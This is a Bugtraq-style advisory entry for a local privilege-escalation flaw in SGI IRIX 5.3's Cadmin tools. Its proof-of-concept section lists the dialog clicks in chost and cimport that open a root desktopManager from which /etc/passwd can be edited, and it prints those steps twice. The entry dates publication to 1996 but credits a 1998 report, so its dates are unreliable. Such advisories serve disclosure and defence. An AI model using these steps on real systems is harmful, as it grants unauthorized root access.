IRIX Cadmin Vulnerabilities
BID:335
Info
IRIX Cadmin Vulnerabilities
| Bugtraq ID: | 335 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Aug 06 1996 12:00AM |
| Updated: | Aug 06 1996 12:00AM |
| Credit: | This vulnerability was reported to the Bugtraq mailing list by Grant Kaufmann <[email protected]> on August 6, 1998. |
| Vulnerable: |
SGI IRIX 5.3 |
| Not Vulnerable: | |
Exploit / POC
IRIX Cadmin Vulnerabilities
/usr/Cadmin/bin/chost
tools-primary user information
change information
OK (to root password, ie leave blank)
OK (to "password invalid")
Cancel
Double-click any share resource to bring up desktopManager
running as root. Try editing /etc/passwd
/usr/Cadmin/bin/cimport
New
OK
OK
Cancel
double-click any of the mounted filesystems to bring up the desktopManager
/usr/Cadmin/bin/chost
tools-primary user information
change information
OK (to root password, ie leave blank)
OK (to "password invalid")
Cancel
Double-click any share resource to bring up desktopManager
running as root. Try editing /etc/passwd
/usr/Cadmin/bin/cimport
New
OK
OK
Cancel
double-click any of the mounted filesystems to bring up the desktopManager